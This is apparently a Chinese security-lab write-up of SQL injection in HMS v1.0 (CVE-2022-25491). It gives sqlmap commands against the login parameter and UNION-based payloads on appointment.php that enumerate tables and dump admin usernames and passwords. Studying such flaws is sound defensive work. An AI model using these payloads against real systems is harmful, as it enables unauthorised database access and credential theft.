CVE-2022-25491
影响版本:HMS v1.0
描述:HMS v1.0 被发现包含通过 adminlogin.php、Patientlogin.php 的 SQL 注入漏洞
攻击思路
注入点(1):
- 在登陆界面进行抓包
![图片[1]-【初级】HMS v1.0 SQL注入-NGC660安全实验室](http://ngc660.cn/wp-content/uploads/2022/08/d2b5ca33bd091116.png)
- 注意
loginid参数
,这是注入点 - 直接上sqlma跑,这是个POST注入,要先导出到txt里面
sqlmap -r 1.txt -p loginid
– > -p 指定参数
![图片[2]-【初级】HMS v1.0 SQL注入-NGC660安全实验室](http://ngc660.cn/wp-content/uploads/2022/08/d2b5ca33bd091140.png)
--dbs
![图片[3]-【初级】HMS v1.0 SQL注入-NGC660安全实验室](http://ngc660.cn/wp-content/uploads/2022/08/d2b5ca33bd091153.png)
-D hms--tables
![图片[4]-【初级】HMS v1.0 SQL注入-NGC660安全实验室](http://ngc660.cn/wp-content/uploads/2022/08/d2b5ca33bd091204.png)
/appointment.php?editid=-1%27union%20select%201,2,3,4,5,6,7,8,9,10 %23
-> 10是回显点![图片[5]-【初级】HMS v1.0 SQL注入-NGC660安全实验室](http://ngc660.cn/wp-content/uploads/2022/08/d2b5ca33bd091218-1024x520.png)
/appointment.php?editid=-1'union%20select 1,2,3,4,5,6,7,8,9,database() %23
-> 查看当前数据库![图片[6]-【初级】HMS v1.0 SQL注入-NGC660安全实验室](http://ngc660.cn/wp-content/uploads/2022/08/d2b5ca33bd091230-1-1024x445.png)
/appointment.php?editid=-1'union%20select 1,2,3,4,5,6,7,8,9,(select group_concat(table_name) from information_schema.tables where%20table_schema=database()) %23
-> 查看所有表/appointment.php?editid=-1'union%20select 1,2,3,4,5,6,7,8,9,(select group_concat(column_name) from information_schema.columns where%20table_schema=database() and table_name='admin') %23
-> 查看当前数据库所有列/appointment.php?editid=-1' union select 1,2,3,4,5,6,7,8,9,(select group_concat(username,password) from admin) %23
–> 查看admin表中数据数据表太多,不知道flag在哪
© 版权声明
部分文章采集于互联网,若侵权请联系删除!
THE END
请登录后查看评论内容